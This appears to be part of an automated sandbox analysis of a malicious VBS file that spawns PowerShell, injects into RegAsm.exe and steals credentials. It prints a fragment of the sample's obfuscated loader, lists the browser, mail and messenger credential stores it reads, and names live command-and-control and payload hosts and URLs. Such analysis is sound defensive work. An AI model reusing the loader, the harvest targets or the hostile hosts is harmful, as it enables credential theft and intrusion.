d.e.cbobs,). 
');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
Source: RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 024/07/27 07:31:02 Program Manager]
Source: RegAsm.exe, 00000004.00000002.3269216080.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, sfvnspt.dat.4.dr Binary or memory string: [2024/07/27 07:31:02 Program Manager]
Source: RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerbulerer"
Source: RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagertionsrmA{x#
Source: RegAsm.exe, 00000004.00000002.3269216080.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager7
Source: RegAsm.exe, 00000004.00000002.3269216080.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerV
Source: RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\*lp}{D#s
Source: RegAsm.exe, 00000004.00000002.3267052966.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3269591579.0000000001005000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00434C52 cpuid 4_2_00434C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,4_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,4_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,4_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,4_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,4_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,4_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,4_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,4_2_00451F9B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404F51 GetLocalTime,CreateEventA,CreateThread,4_2_00404F51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B60D GetComputerNameExW,GetUserNameW,4_2_0041B60D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_00449190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041739B GetVersionExW,7_2_0041739B
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: wscript.exe, 00000000.00000003.1989125695.000001DA6157B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1988144159.000001DA61567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1991345397.000001DA6157D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: APT.EXE

                  Stealing of Sensitive Information

Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 4_2_0040BA12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 4_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db | 4_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: ESMTPPassword | 8_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword | 8_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword | 8_2_00402DB3
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3620, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe | 4_2_0040569A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information331
                  Scripting
                  Valid Accounts11
                  Windows Management Instrumentation
                  331
                  Scripting
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  14
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  13
                  Obfuscated Files or Information
                  211
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  Software Packing
                  2
                  Credentials in Registry
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts222
                  Command and Scripting Interpreter
                  Login Hook1
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Credentials In Files
                  3
                  File and Directory Discovery
                  Distributed Component Object Model211
                  Input Capture
                  214
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  Service Execution
                  Network Logon Script422
                  Process Injection
                  1
                  Bypass User Account Control
                  LSA Secrets39
                  System Information Discovery
                  SSH3
                  Clipboard Data
                  Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable Media2
                  PowerShell
                  RC ScriptsRC Scripts11
                  Masquerading
                  Cached Domain Credentials141
                  Security Software Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion
                  DCSync21
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation
                  Proc Filesystem4
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt422
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1483434
Sample: createdthingstobefrankwithm...
Startdate: 27/07/2024
Architecture: WINDOWS
Score: 100

Start node
  DNS/IP: iwarsut775laudrye2.duckdns.org (Uses dynamic DNS services); new.quranushaiqer.org.sa; 3 other IPs or domains
  Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 22 other signatures
  Started: wscript.exe

wscript.exe
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 4 other signatures
  Started: powershell.exe

powershell.exe
  DNS/IP: 104.168.45.34, 49705, 80, AS-COLOCROSSINGUS, United States; 198.46.176.133, 49704, 80, AS-COLOCROSSINGUS, United States
  Signatures: Writes to foreign memory regions; Suspicious execution chain found; Injects a PE file into a foreign processes
  Started: RegAsm.exe; conhost.exe

RegAsm.exe
  DNS/IP: iwarsut775laudrye2.duckdns.org 192.253.251.227, 49706, 49707, 49708, THORDC-ASIS, United States; geoplugin.net 178.237.33.50, 49709, 80, ATOM86-ASATOM86NL, Netherlands
  Dropped: C:\Users\user\AppData\Roaming\sfvnspt.dat (data); C:\Users\user\AppData\...\Forfrelsens.vbs (ASCII)
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Tries to steal Mail credentials (via file registry); Potential malicious VBS script found (suspicious strings); 8 other signatures
  Started: wscript.exe; RegAsm.exe; RegAsm.exe; 2 other processes

  wscript.exe
    Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; 3 other signatures
    Started: powershell.exe

    powershell.exe
      DNS/IP: asociatiatraditiimaria.ro 93.113.54.56, 443, 49711, 49719, GTSCEGTSCentralEuropeAntelGermanyCZ, Romania; new.quranushaiqer.org.sa 34.166.62.190, 443, 49720, ATGS-MMD-ASUS, United States
      Signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
      Started: powershell.exe (which in turn started cmd.exe); conhost.exe; cmd.exe

  RegAsm.exe
    Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)

  RegAsm.exe
    Signatures: Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
createdthingstobefrankwithmeeverywhere.gIF.vbs | 0% | ReversingLabs
createdthingstobefrankwithmeeverywhere.gIF.vbs | 18% | Virustotal
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
bg.microsoft.map.fastly.net | 0% | Virustotal
asociatiatraditiimaria.ro | 15% | Virustotal
geoplugin.net | 1% | Virustotal
iwarsut775laudrye2.duckdns.org | 19% | Virustotal
new.quranushaiqer.org.sa | 17% | Virustotal
Source | Detection | Scanner | Label
http://www.imvu.comr | 0% | URL Reputation | safe
http://www.imvu.comr | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://gmpg.org/xfn/11 | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://login.yahoo.com/config/login | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
http://www.nirsoft.net | 0% | Avira URL Cloud | safe
http://www.imvu.com | 0% | URL Reputation | safe
https://api.w.org/ | 0% | URL Reputation | safe
https://asociatiatraditiimaria.ro/feed/ | 0% | Avira URL Cloud | safe
http://198.46.176.133/Upload/vbs.jpegM | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm | 100% | Avira URL Cloud | malware
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://www.ebuddy.com | 0% | URL Reputation | safe
http://www.nirsoft.net | 0% | Virustotal
https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver= | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Avira URL Cloud | safe
https://asociatiatraditiimaria.ro/feed/ | 14% | Virustotal
